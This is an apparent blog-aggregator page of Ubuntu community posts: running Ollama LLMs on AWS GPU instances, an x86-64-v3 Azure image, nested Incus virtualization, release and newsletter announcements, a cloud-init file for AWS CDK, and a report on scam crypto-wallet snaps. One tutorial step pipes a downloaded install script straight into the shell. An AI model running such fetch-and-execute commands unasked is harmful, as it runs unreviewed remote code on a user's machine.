March 27, 2024

In our previous post, we discussed how to generate images using Stable Diffusion on AWS. In this post, we will guide you through running LLMs for text generation in your own environment with a GPU-based instance, in simple steps, empowering you to create your own solutions.

Text generation, a trending focus in generative AI, facilitates a broad spectrum of language tasks beyond simple question answering. These tasks include content extraction, summary generation, sentiment analysis, text enhancement (including spelling and grammar correction), code generation, and the creation of intelligent applications like chatbots and assistants.

In this tutorial, we will demonstrate how to deploy two prominent large language models (LLMs) on a GPU-based EC2 instance on AWS (G4dn) using Ollama, an open source tool for downloading, managing, and serving LLM models. Before getting started, ensure you have completed our technical guide for installing NVIDIA drivers with CUDA on a G4dn instance.

We will utilize Llama2 and Mistral, both strong contenders in the LLM space with open source licenses suitable for this demo.

While we won’t explore the technical details of these models, it is worth noting that Mistral has shown impressive results despite its relatively small size (7 billion parameters, fitting into a GPU with 8GB of VRAM). Llama2, meanwhile, provides a range of models for various tasks, all available under open source licenses, which makes it well-suited for this tutorial.

To experiment with question-answer models similar to ChatGPT, we will utilize the fine-tuned versions optimized for chat or instruction (Mistral-instruct and Llama2-chat), as the base models are primarily designed for text completion.

Let’s get started!

Step 1: Installing Ollama

To begin, open an SSH session to your G4dn server and verify the presence of NVIDIA drivers and CUDA by running:

nvidia-smi

Keep in mind that you need to have the SSH port open, the key-pair created or assigned to the machine during creation, the external IP of the machine, and software like ssh for Linux or PuTTY for Windows to connect to the server.
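For instance, from a Linux or macOS terminal, a typical connection looks like this (a sketch assuming an Ubuntu AMI and a key-pair file named myKeyPair.pem, the same names used for the tunnel later in this guide):

ssh -i myKeyPair.pem ubuntu@<Machine_IP>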

If the drivers are not installed, refer to our technical guide on installing NVIDIA drivers with CUDA on a G4DN instance.

Once you have confirmed the GPU drivers and CUDA are set up, proceed to install Ollama. You can opt for a quick installation using their binary, or choose to clone the repository for a manual installation.

To install Ollama quickly, run the following command:

curl -fsSL https://ollama.com/install.sh | sh
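Once the script finishes, you can sanity-check the installation; this should print the installed Ollama version:

ollama --version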

Step 2: Running LLMs on Ollama

Let’s start with Mistral models and view the results by running:

ollama run mistral

This instruction will download the Mistral model (4.1GB) and serve it, providing a prompt for immediate interaction with the model.

[Screenshot: Mistral’s response to a prompt written in Spanish]

Not a bad response for a prompt written in Spanish! Now let’s experiment with a prompt to write code:

[Screenshot: Mistral generating working code from a prompt]

Impressive indeed. The response is not only generated rapidly, but the code also runs flawlessly, with basic error handling and explanations. (Here’s a pro tip: consider asking for code comments, docstrings, and even test functions to be incorporated into the code). 

Exit with the /bye command.
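Incidentally, plain ollama run mistral pulls the model’s default tag. To try the instruction-tuned and chat variants mentioned earlier, you can request them explicitly by tag (a sketch based on the tag names in the Ollama model library at the time of writing; they may change):

ollama run mistral:instruct
ollama run llama2:7b-chat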

Now, let’s enter the same prompt with Llama2.

[Screenshot: Llama2’s chat-style response to the same Spanish prompt]

We can see that there are immediate, notable differences. This may be due to the training data it has encountered, as it defaulted to a playful and informal chat-style response. 

Let’s try Llama2 using the same code prompt from above:

[Screenshot: Llama2’s attempt at the same code prompt]

The results of this prompt are quite interesting. Across four separate tests, the generated responses contained not only broken code but also inconsistencies within the responses themselves. Writing code does not appear to be one of the out-of-the-box strengths of this Llama2 variant (7B parameters; there are also versions specialized in code, such as Code Llama), but results may vary.

Let’s run a final test with Code Llama, a Llama model fine-tuned to create and explain code:

[Screenshot: Downloading and running the Code Llama model]

We will use the same prompt from above to write the code:

[Screenshot: Code Llama’s response to the same code prompt]

This time, the response is improved, with the code functioning properly and a satisfactory explanation provided.

You now have the option to either continue exploring directly through this interface or start developing apps using the API.
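If you choose the API route, a minimal sketch of a request looks like this (assuming Ollama’s default port 11434 and its /api/generate endpoint; setting "stream" to false returns a single JSON response instead of a stream):

curl http://localhost:11434/api/generate -d '{
  "model": "mistral",
  "prompt": "Why is the sky blue?",
  "stream": false
}'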

Final test: A chat-like web interface

We now have something ready for immediate use. However, for some added fun, let’s install a chat-like web interface to mimic the experience of ChatGPT.

For this test, we are going to use ollama-ui (https://github.com/ollama-ui/ollama-ui). 

⚠︎ Please note that this project is no longer maintained and users should transition to Open WebUI, but for the sake of simplicity we will still use the ollama-ui front-end.

In your terminal window, clone the ollama-ui repository by entering the following command:

git clone https://github.com/ollama-ui/ollama-ui

Here’s a cool trick: when you run Ollama, it creates an API endpoint on port 11434. Ollama-ui, however, runs and is accessible on port 8000, so we’ll need to ensure both ports are securely accessible from our machine.

Since we are running this as a development service (without the security features and performance of a production web server), we will establish an SSH tunnel for both ports. This setup will enable us to access these ports exclusively from our local computer, with communication encrypted over SSH.

To create the tunnel for both the web-ui and the model’s API, close your current SSH session and open a new one with the following command:

ssh -L 8000:localhost:8000 -L 11434:127.0.0.1:11434 -i myKeyPair.pem ubuntu@<Machine_IP>

Once the tunnel is set up, navigate to the ollama-ui directory in a new terminal and run the following command:

cd ollama-ui
make

Next, open your local browser and go to 127.0.0.1:8000 to enjoy the chat web interface!

[Screenshot: The ollama-ui chat interface running in the browser]

While the interface is simple, it enables dynamic model switching, supports multiple chat sessions, and facilitates interaction beyond reliance on the terminal (aside from tunneling). This offers an alternative method for testing the models and your prompts.

Final thoughts

Thanks to Ollama, and to how simple it is to install the NVIDIA drivers on a GPU-based instance, running LLMs for text generation in your own environment is a very straightforward process. Additionally, Ollama facilitates the creation of custom model versions and fine-tuning, which is invaluable for developing and testing LLM-based solutions.
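As a taste of that, here is a minimal sketch of a custom model defined with a Modelfile (the model name my-mistral and the system prompt are hypothetical examples):

cat > Modelfile <<'EOF'
FROM mistral
SYSTEM """You are a concise assistant that answers questions about AWS."""
EOF
ollama create my-mistral -f Modelfile
ollama run my-mistral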

When selecting the appropriate model for your specific use case, it is crucial to evaluate each model’s capabilities based on its architecture and the data it was trained on. Be sure to explore fine-tuned variants such as Code Llama, as well as specialized versions tailored for generating Python code.

Lastly, for those aiming to develop production-ready applications, remember to review the model license and plan for scalability, as a single GPU server may not suffice for multiple concurrent users. You may want to explore Amazon Bedrock, which offers easy access to various versions of these models through a simple API call or Canonical MLOps, an end-to-end solution for training and running your own ML models.

Quick note regarding the model size

The size of the model significantly impacts the quality of the results. A larger model is more capable of producing better content (since it has a greater capacity to “learn”). Larger models also offer a larger attention window (for “understanding” the context of the question), and allow more tokens as input (your instructions) and output (the response).

As an example, Llama2 offers three main model sizes: 7, 13, or 70 billion parameters. The 7B model requires a GPU with a minimum of 8GB of VRAM, whereas the 13B model requires a minimum of 16GB.
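If your GPU has enough VRAM, you can pull a larger variant explicitly by tag (a sketch; tag names may change over time):

ollama run llama2:13b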

Let me share a final example:

I will ask the 7B-parameter version of Llama2 to proofread an incorrect version of the simple Spanish phrase “¿Hola, cómo estás?”, which translates to “Hi, how are you?” in English.

[Screenshot: Llama2 7B mishandling the Spanish proofreading request]

I conducted numerous tests, all yielding incorrect results like the one displayed in the screenshot (where “óle” is not a valid word, and it erroneously suggests it means “hello”).

Now, let’s test the same example with Llama2 with 13 billion parameters:

[Screenshot: Llama2 13B handling the same proofreading request]

While it failed to recognize that I intended to write “hola,” this outcome is significantly better: it added the accents and question marks, and it detected that “ola” wasn’t the right word to use (if you are curious, it means “wave”).

on March 27, 2024 03:09 PM

Ubuntu 23.10 experimental image with x86-64-v3 instruction set now available on Azure

Canonical is enabling enterprises to evaluate the performance of their most critical workloads in an experimental Ubuntu image on Azure compiled with x86-64-v3, which is a microarchitecture level that has the potential for performance gains. Developers can use this image to characterise workloads, which can help inform planning for a transition to x86-64-v3 and provide valuable input to the community working to make widespread adoption of x86-64-v3 a reality. 

The x86-64-v3 instruction set enables hardware features that have been added by chip vendors since the original instruction set architecture (ISA), commonly known as x86-64-v1, x86-64, or amd64. Canonical Staff Engineer Michael Hudson-Doyle recently wrote about the history of the x86-64/amd64 instruction sets, what these v1 and v3 microarchitecture levels represent, and how Canonical is evaluating their performance. While fully backwards compatible, later versions of these feature groups are not available on all hardware, so when deciding on an ISA image you must choose between maximising the range of supported hardware and getting access to more recent hardware capabilities. Canonical plans to continue supporting x86-64-v1 as there is a significant amount of legacy hardware deployed in the field. However, we also want to enable users to take advantage of newer x86-64-v3 hardware features that provide the opportunity for performance improvements the industry isn’t yet capitalising on.

Untapped performance and power benefits

Intel and Canonical partner closely to ensure that Ubuntu takes full advantage of the advanced hardware features Intel silicon offers, and the Ubuntu image on Azure is an interim step towards giving the industry access to the capabilities of x86-64-v3 and understanding the benefits that it offers. Intel has made x86-64-v3 available since Intel Haswell was first announced a decade ago. Support in their low-power processor family is more recent, arriving in the Gracemont microarchitecture, which first appeared in the 12th generation of Intel Core processors. Similarly, AMD has had examples since 2015, and emulators such as QEMU have supported x86-64-v3 since 2022. Yet, despite this broad base of hardware availability, distro support for the features in the x86-64-v3 microarchitecture level is not widespread. In the spirit of enabling Ubuntu everywhere and ensuring that users can benefit from the unique features on different hardware families, Canonical feels strongly about enabling a transition to x86-64-v3 while remaining committed to our many users on hardware that doesn’t support v3. x86-64-v3 is available in a significant amount of hardware, and provides the opportunity for performance improvements which are currently being left on the table. This is why we believe that v3 is the next logical microarchitecture level to offer in Ubuntu, and Michael’s blog post explains in greater detail why v3 should be chosen instead of v2 or v4.

Not just a porting exercise

The challenge with enabling the transition to v3 is that while we expect a broad range of performance improvements depending on the workload, the results are much more nuanced. From Canonical’s early benchmarking we see that certain workloads benefit significantly from the adoption of x86-64-v3; however, there are outliers that regress and need further analysis.

Canonical continues to do benchmarking, with plans to evaluate different compilers, compiler parameters, and configurations of host OS and guest OS. In certain cases, such as the Glibc Log2 benchmark, we have reproducibly seen up to a 60% improvement. On the other hand, we also see other benchmarks that regress significantly. When digging in, we found unexpected behaviour in the compiled code. For example, in one of the benchmarks we verified an excessive number of moves between registers, leading to much worse performance due to the increased latency. In another situation, we noticed a large code size increase, as enabling x86-64-v3 on optimised SSE code caused the compiler to expand it into 17x more instructions, due to a possible bug during the translation to VEX encoding. With community efforts, these outliers could be resolved. However, they will require interdisciplinary collaboration to do so. This also underscores the necessity of benchmarking different types of workloads, so that we can understand their specific performance and bottlenecks. That’s why we believe it’s important to enable workloads to run on Azure, so that a broader community can give feedback and enable further optimisation.

Try Ubuntu 23.10 with x86-64-v3 on Azure today

The community now has access to resources on Azure to easily evaluate the performance of x86-64-v3 for their workloads, so that they can understand the benefits of migrating and can identify where improvements are still required. What is being shared today is experimental and for evaluation and benchmarking purposes only, which means that it won’t receive security updates or other maintenance updates you would expect from an image you could use in production. When x86-64-v3 is introduced for production workloads, there will be a benefit to being able to run both v3 and v1 depending on the workload and hardware available. As is usually the case, the answer to the question of whether to run on a v3 image or a v1 image is ‘it depends’. This image provides the tools to answer that cost, power, and performance optimisation problem. In addition to the availability of the cloud image on Azure, we’ve also previously posted on the availability of Ubuntu 23.04 rebuilt to target the x86-64-v3 microarchitecture level, and made installer images available from that archive. These are additional tools that the community can use to benchmark when cloud environments can’t be targeted.

In order to access the image on Azure and use it, you can follow the instructions in our discourse post. Please be sure to leave your feedback there, or contact us directly to discuss your use case.


on March 27, 2024 02:04 PM

Incus is a manager for virtual machines (VM) and system containers. There is also an Incus support forum.

A virtual machine (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines. System containers reuse the running Linux kernel of the host, therefore you can only have Linux system containers, though from any Linux distribution.

In this post we see how to create a VM with Incus, install Incus into that VM, and then create a VM through the inner Incus installation. This is also called nested virtualization. Incus works fine with nested virtualization. Any pitfalls arise from the settings of the host (BIOS/UEFI settings, host Linux kernel, etc). We’ll see these together, step by step.


Configuring your hardware for virtualization

You would need to enter into the BIOS/UEFI settings and enable the option for VT-x (for Intel CPUs) or AMD-V (for AMD CPUs) virtualization. If you are unsure, you can just follow the instructions in the next step which will complain if you have not enabled the appropriate BIOS/UEFI settings.

As a side note, there is another setting, Intel VT-d (for Intel CPUs) or AMD-Vi (for AMD CPUs), that allows you to pass a supported hardware device (like a GPU, if you have more than one) through to the VM. It is not essential for what we are testing, but keep it in mind if you get too deep into virtualization.

There are also some optional settings that help with performance: Nested Page Tables (NPT), also known as Rapid Virtualization Indexing (RVI), for AMD, and Extended Page Tables (EPT) for Intel.

Testing your host for virtualization

The Linux kernel that is available in most Linux distributions supports the KVM hypervisor for virtualization.

Applications use the libvirt toolkit to access the virtualization features.

To test whether our host supports virtualization, we install the cpu-checker and libvirt-clients packages on the host, then run kvm-ok and virt-host-validate respectively to verify our system. Of the two utilities, the latter is more thorough. However, I am including cpu-checker as it is covered in lots of documentation.

$ sudo apt install -y cpu-checker libvirt-clients
...
$ kvm-ok
INFO: /dev/kvm exists
KVM acceleration can be used
$ sudo virt-host-validate
  QEMU: Checking for hardware virtualization                                 : PASS
  QEMU: Checking if device /dev/kvm exists                                   : PASS
  QEMU: Checking if device /dev/kvm is accessible                            : PASS
  QEMU: Checking if device /dev/vhost-net exists                             : PASS
  QEMU: Checking if device /dev/net/tun exists                               : PASS
  QEMU: Checking for cgroup 'cpu' controller support                         : PASS
  QEMU: Checking for cgroup 'cpuacct' controller support                     : PASS
  QEMU: Checking for cgroup 'cpuset' controller support                      : PASS
  QEMU: Checking for cgroup 'memory' controller support                      : PASS
  QEMU: Checking for cgroup 'devices' controller support                     : PASS
  QEMU: Checking for cgroup 'blkio' controller support                       : PASS
  QEMU: Checking for device assignment IOMMU support                         : PASS
  QEMU: Checking if IOMMU is enabled by kernel                               : PASS
  QEMU: Checking for secure guest support                                    : WARN (Unknown if this platform has Secure Guest support)
   LXC: Checking for Linux >= 2.6.26                                         : PASS
   LXC: Checking for namespace ipc                                           : PASS
   LXC: Checking for namespace mnt                                           : PASS
   LXC: Checking for namespace pid                                           : PASS
   LXC: Checking for namespace uts                                           : PASS
   LXC: Checking for namespace net                                           : PASS
   LXC: Checking for namespace user                                          : PASS
   LXC: Checking for cgroup 'cpu' controller support                         : PASS
   LXC: Checking for cgroup 'cpuacct' controller support                     : PASS
   LXC: Checking for cgroup 'cpuset' controller support                      : PASS
   LXC: Checking for cgroup 'memory' controller support                      : PASS
   LXC: Checking for cgroup 'devices' controller support                     : PASS
   LXC: Checking for cgroup 'freezer' controller support                     : FAIL (Enable 'freezer' in kernel Kconfig file or mount/enable cgroup controller in your system)
   LXC: Checking for cgroup 'blkio' controller support                       : PASS
   LXC: Checking if device /sys/fs/fuse/connections exists                   : PASS
$ 

If you get a failure, try to identify whether the issue is with your computer’s firmware or with the Linux kernel of your host. If in doubt, post the output in the comments below.

Why does the output mention both QEMU and LXC? By default, the command shows all libvirt virtualization support, unless you specify something specific. If you wanted only the QEMU output, you would run sudo virt-host-validate qemu. Note that LXC here refers to libvirt’s LXC driver, not the Linux Containers LXC.

Testing your host for nested virtualization

I have not noticed any mention of nested virtualization in the output of virt-host-validate. If you know a tool that shows that information, write it in the comments. In the absence of such a tool, let’s check manually.

If you have an AMD CPU, run the following. If you get 1, then nested virtualization through KVM works.

$ cat /sys/module/kvm_amd/parameters/nested 
1
$ 

If instead you have an Intel CPU, run the following. If you get Y (instead of 1), then nested virtualization through KVM works.

$ cat /sys/module/kvm_intel/parameters/nested
Y
$ 

If instead you get an error (such as the following), then something is wrong. Report back your CPU model and motherboard, along with the Linux kernel version and Linux distribution.

cat: /sys/module/kvm_intel/parameters/nested: No such file or directory
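If the module is loaded but nested support is merely disabled, you may be able to turn it on by reloading the KVM module with the nested parameter. A sketch for Intel follows (use kvm_amd on AMD); note that unloading the module will fail while any VMs are running:

sudo modprobe -r kvm_intel
sudo modprobe kvm_intel nested=1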

Launching the outer Incus VM

We launch the outer VM, get a shell into it, and install Incus along with the utilities that show whether KVM virtualization works. Then, we launch an Alpine VM inside the outer VM. We get an error regarding Secure Boot (the Alpine Linux kernel is not signed), remove the stuck VM, and launch again with Secure Boot disabled. Finally, we get a shell into the inner VM.

$ incus launch images:debian/12 outervm --vm
Launching outervm
$ incus shell outervm
root@outervm:~#

      # Install Incus according to the documentation.

root@outervm:~# sudo apt install -y cpu-checker libvirt-clients
...
root@outervm:~# virt-host-validate 
  QEMU: Checking for hardware virtualization                                 : PASS
  QEMU: Checking if device /dev/kvm exists                                   : PASS
  QEMU: Checking if device /dev/kvm is accessible                            : PASS
  QEMU: Checking if device /dev/vhost-net exists                             : PASS
  QEMU: Checking if device /dev/net/tun exists                               : PASS
...
root@outervm:~# incus launch images:alpine/edge innervm --vm
Launching innervm
Error: Failed instance creation: The image used by this instance is incompatible with secureboot. Please set security.secureboot=false on the instance
root@outervm:~# incus delete innervm
root@outervm:~# incus launch images:alpine/edge innervm --vm --config security.secureboot=false
Launching innervm
root@outervm:~# incus list -c ns4t
+---------+---------+-----------------------+-----------------+
|  NAME   |  STATE  |         IPV4          |      TYPE       |
+---------+---------+-----------------------+-----------------+
| innervm | RUNNING | 10.227.169.165 (eth0) | VIRTUAL-MACHINE |
+---------+---------+-----------------------+-----------------+
root@outervm:~# uname -a
Linux outervm 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
root@outervm:~# incus shell innervm
innervm:~# uname -a
Linux innervm 6.6.22-1-virt #2-Alpine SMP PREEMPT_DYNAMIC Thu, 14 Mar 2024 02:12:52 +0000 x86_64 Linux
innervm:~# 

Conclusion

We saw how to verify whether our host is able to work with hardware virtualization. This involves checking both the computer firmware settings (BIOS/UEFI) and the host Linux kernel.

Then, we created an outer VM with Incus, got a shell into there, installed Incus, and launched an inner (nested) VM.

I wonder whether we can go further and create a VM inside the inner VM. If you go through these and try to create an inner inner VM, post the error message. It does not feel like it should be possible.

on March 27, 2024 01:40 PM

March 26, 2024

Announcing Incus 0.7

Stéphane Graber

The last Incus release before we go LTS has now been released!

This is quite the feature-packed release, as it is meant to include just about every feature we want in Incus 6.0 LTS, except for a few last-minute minor additions.

You’ll find new features for just about everyone, from multi-cluster networking with the new network integrations, to enhanced performance on multi-socket servers with the improved NUMA support, to easier authentication with JSON Web Token support, to I/O limits for virtual machines and more USB passthrough options.

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

You can take the latest release of Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects are also always appreciated. You can find me on GitHub Sponsors, Patreon and Ko-fi.

Enjoy!

on March 26, 2024 10:42 PM

March 25, 2024

Welcome to the Ubuntu Weekly Newsletter, Issue 832 for the week of March 17 – 23, 2024. The full version of this issue is available here.

In this issue we cover:

  • Ubuntu Stats
  • Hot in Support
  • FLISoL San José de Pare – El primer FLISoL del año en Colombia
  • LoCo Events
  • March 8, Women’s Day – Marzo 8, Día Internacional de la Mujer – Bogotá, Colombia
  • Ubuntu Studio: Wallpaper Competition Winners 24.04 LTS
  • Ubuntu Cloud News
  • Canonical News
  • In the Blogosphere
  • Other Articles of Interest
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!


on March 25, 2024 10:04 PM

March 24, 2024

The Matrix has you, part 2

Stuart Langridge

I’ve recently switched back from vscode to Sublime Text, which means that after all the time I spent training my fingers to type “code somefile.txt” instead of “subl somefile.txt” I now need to undo all that conditioning and go back to subl again. So I thought, hey, maybe I should dump a little shell script called code in my bin folder which admonished me in some amusing way, thus Pavlov-ing myself into learning to do it right.

And then I thought, hey, what’d be cool is if I had that Matrix-esque “raining code” effect in the Terminal and then it was superimposed with a box saying “STOP TYPING code AND USE subl INSTEAD”, like the “SYSTEM ERROR” message at the end of the first movie.

And then I thought: someone’s already done this, right? And they have; it is called cmatrix. But I don’t like cmatrix because it doesn’t do the colours right; the text just sorta stops rather than fading away like the movie does, and it feels unreal and too sharp for me. Now, don’t get me wrong, I understand why this is; terminals support a full proper range of colour these days, but writing a program which gets released to actual people and which can deal with the bewildering array of terminal settings out there is a miserable waste of everyone’s time. But I’m not writing this for anyone else; it only has to work in my terminal (in true works on my machine fashion). And this will give me a chance to noodle about with Python terminal libraries such as blessed to make something interesting. Hence, matrix24.py:

It’s a bodge all round, and it still doesn’t look right, and Jess pointed out that making something cool happen when I make a mistake is the opposite of conditioning, but I got to fiddle about with a new library for a bit, so that was fun. Can I do something productive now?

(title from a classic post about the Matrix which still makes me laugh even after all these years, although it is very unfair to Keanu Reeves who is a cool bloke and should be emulated in his approach to life)

on March 24, 2024 03:40 PM

Multipass cloud-init

Dougie Richardson

Multipass is pretty useful, but this was a pain to figure out, because Ubuntu’s Node.js package does not work with AWS CDK.

Multipass lets you manage VMs on Ubuntu and can take cloud-init scripts as a parameter. I wanted an Ubuntu LTS instance with AWS CDK, which needs Node.js and python3-venv.

#cloud-config
packages:
  - python3-venv
  - unzip

package_update: true

package_upgrade: true

write_files:
  - path: "/etc/environment"
    append: true
    content: |
      export PATH=\
      /opt/node-v20.11.1-linux-x64/bin:\
      /usr/local/sbin:/usr/local/bin:\
      /usr/sbin:/usr/bin:/sbin:/bin:\
      /usr/games:/usr/local/games:\
      /snap/bin

runcmd:
  - wget https://nodejs.org/dist/v20.11.1/node-v20.11.1-linux-x64.tar.xz 
  - tar xvf node-v20.11.1-linux-x64.tar.xz -C /opt
  - export PATH=/opt/node-v20.11.1-linux-x64/bin:$PATH
  - npm install -g npm@latest
  - npm install -g aws-cdk
  - git config --system user.name "Dougie Richardson"
  - git config --system user.email "xx@xxxxxxxxx.com"
  - git config --system init.defaultBranch main
  - wget https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
  - unzip awscli-exe-linux-x86_64.zip
  - ./aws/install

Save that as cdk.yaml and spin up a new instance:

multipass launch --name cdk --cloud-init cdk.yaml
Success!

There are a couple of useful things to note if you’re checking this out:

  • Inside the VM there’s a useful log to assist debugging: /var/log/cloud-init-output.log.
  • While YAML has lots of ways to split text over multiple lines, use a backslash when you don’t want a space.

Shell into the new VM with multipass shell cdk, then we can configure programmatic access and bootstrap CDK.

aws configure sso
aws sso login --profile profile_name
aws sts get-caller-identity --profile profile_name
aws configure get region --profile profile_name

The last two commands give the account and region to bootstrap:

cdk bootstrap aws://account_number/region --profile profile_name
on March 24, 2024 01:30 PM

March 22, 2024

We are excited to announce a call for submissions for the official desktop wallpaper of Kubuntu 24.04! This is a fantastic opportunity for artists, designers, and Kubuntu enthusiasts to showcase their talent and contribute to the visual identity of the upcoming Kubuntu release.

What We’re Looking For

We are in search of unique, inspiring, and beautiful wallpapers that reflect the spirit of Kubuntu and its community. Your design should captivate users with its creativity, while also embodying the essence of Kubuntu’s commitment to freedom, elegance, and technical excellence.

Submission Guidelines

Resolution: Submissions must be at least 3840×2160 pixels to ensure high quality on all displays.

Format: JPEG or PNG is preferred.

Original Work: Your submission must be your original work and not include any copyrighted material unless you have permission to use it.

Theme: While we encourage creativity, your design should be suitable for a wide audience and align with the values and aesthetics of the Kubuntu community.

How to Submit

Please send your wallpaper submissions to Rick Timmis of the Kubuntu Council, via one of:

Deadline

The deadline for submissions is March 31, 2024. We will review all submissions and select the design(s) to be included as part of the Kubuntu 24.04 release. The selected artist(s) will receive credit in the release notes and across our social media platforms, showcasing your contribution to users worldwide.

Let Your Creativity Shine

This is your chance to leave a mark on the Kubuntu community and be a part of the journey towards an exciting new release. We can’t wait to see your submissions and the diverse interpretations of what Kubuntu represents to you.

Embrace this opportunity to let your creativity shine and help make Kubuntu 24.04 the most visually stunning release yet. Good luck to all participants!

on March 22, 2024 08:19 AM

March 21, 2024

A Crowning Achievement

24.04 LTS will represent the eighth Long-Term Support release of Ubuntu Studio, and its 32nd release overall. For this release, we wanted to make sure we got some great representation from the community in terms of wallpaper, and while there weren’t as many entries as in our previous competition, we were blown away by the quality. While not every wallpaper could be included, all of the entries were solid, and narrowing it down to the best of the best was very difficult.

Revealing The Default

Our long-time art lead, Eylul Dogruel, worked diligently on a quality textured default wallpaper that works well not only for traditional horizontal screens, but for vertical screens as well, without losing quality. We have two variations: one with our logo, and one with the mascot that will be rotated out over the next four releases.

Now to Crown the Winners!

As stated, this was a very difficult decision, but we would like to congratulate the winners of the competition! The full-quality images will be included in Ubuntu Studio 24.04 LTS and are already in our daily builds of Noble Numbat.

Interference by Uday Nakade
Glass Wave 1 Light by Alastair Temple
Bee 2 by Liber Dovat
Brauneck Sunrise by Uday Nakade
Banaue by Jean-Daniel Bancal
on March 21, 2024 09:22 PM

E291 Santo Seppuku

Podcast Ubuntu Portugal

Watashitachi no komyuniti wa kyōryokudesu! (“Our community is strong!”) Diogo made a mistake, and his ancestors demand that he restore the podcast’s honour. Now we’re talking: this country is finally moving forward, now that PC Guia has released a pen drive with GNU/Linux distributions to educate the people! ANSOL is gaining ever more ground in the media, its general assembly was full of applause, parades and little flags, and free software marches on towards the singing tomorrows! Meanwhile, Miguel doesn’t like banks; Canonical continues to have problems with cryptocurrency applications; Firefox is full of goodies; and Ubuntu 24.04 LTS is on its way with beautiful wallpapers!

You know the drill: listen, subscribe and share!

Support

You can support the podcast using the Humble Bundle affiliate links, because when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get everything for 15 dollars, or different parts depending on whether you pay 1 or 8. We think this is worth well more than 15 dollars, so if you can, pay a little more, since you have the option of paying as much as you like. If you are interested in other bundles not listed in the notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.

Attribution and licences

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo, and the open source code is licensed under the terms of the MIT License. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License. This episode and the image used are licensed under the terms of the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, the full text of which can be read here. We are open to licensing for other types of use; contact us for validation and authorisation.

on March 21, 2024 12:00 AM

March 19, 2024

On Mastodon, the question came up of how Ubuntu would deal with something like the npm install everything situation. I replied:

Ubuntu is curated, so it probably wouldn’t get this far. If it did, then the worst case is that it would get in the way of CI allowing other packages to be removed (again from a curated system, so people are used to removal not being self-service); but the release team would have no hesitation in removing a package like this to fix that, and it certainly wouldn’t cause this amount of angst.

If you did this in a PPA, then I can’t think of any particular negative effects.

OK, if you added lots of build-dependencies (as well as run-time dependencies) then you might be able to take out a builder. But Launchpad builders already run arbitrary user-submitted code by design and are therefore very carefully sandboxed and treated as ephemeral, so this is hardly novel.

There’s a lot to be said for the arrangement of having a curated system for the stuff people actually care about plus an ecosystem of add-on repositories. PPAs cover a wide range of levels of developer activity, from throwaway experiments to quasi-official distribution methods; there are certainly problems that arise from it being difficult to tell the difference between those extremes and from there being no systematic confinement, but for this particular kind of problem they’re very nearly ideal. (Canonical has tried various other approaches to software distribution, and while they address some of the problems, they aren’t obviously better at helping people make reliable social judgements about code they don’t know.)

For a hypothetical package with a huge number of dependencies, to even try to upload it directly to Ubuntu you’d need to be an Ubuntu developer with upload rights (or to go via Debian, where you’d have to clear a similar hurdle). If you have those, then the first upload has to pass manual review by an archive administrator. If your package passes that, then it still has to build and get through proposed-migration CI before it reaches anything that humans typically care about.

On the other hand, if you were inclined to try this sort of experiment, you’d almost certainly try it in a PPA, and that would trouble nobody but yourself.

on March 19, 2024 07:05 AM

March 18, 2024

Welcome to the Ubuntu Weekly Newsletter, Issue 831 for the week of March 10 – 16, 2024. The full version of this issue is available here.

In this issue we cover:

  • Welcome New Members and Developers
  • Ubuntu Stats
  • Hot in Support
  • UbuCon Asia 2024 – Call for proposals
  • Catalan Team: Call for participation in the Noble Festival
  • LoCo Events
  • Ubuntu Quality – Communications and Testing Practices
  • Other Community News
  • Ubuntu Cloud News
  • Canonical News
  • In the Press
  • In the Blogosphere
  • Other Articles of Interest
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

on March 18, 2024 09:08 PM

Previously…

Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.

The snap was eventually removed, and some threads were started over on the Snapcraft forum.

Groundhog Day

Nothing has changed it seems, because once again, ANOTHER TEN scam BitCoin wallet apps have been published in the Snap Store today.

You’re joking! Not another one!

Yes, Brenda!

This one has the snappy (sorry) name of exodus-build-96567 published by that not-very-legit looking publisher digisafe00000. Uh-huh.

Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular crypto wallet brand names.

Publisher digisafe00000

Edit: These were removed. One day later, they popped up again, under a new account. I reported all of them, and pinged someone at Canonical to get them removed.

Publisher codeshield0x0000

There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.

Presentation

Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum effort on the store listing page here. But I’m sure it could fool someone, they usually do.

A not very legit looking snap

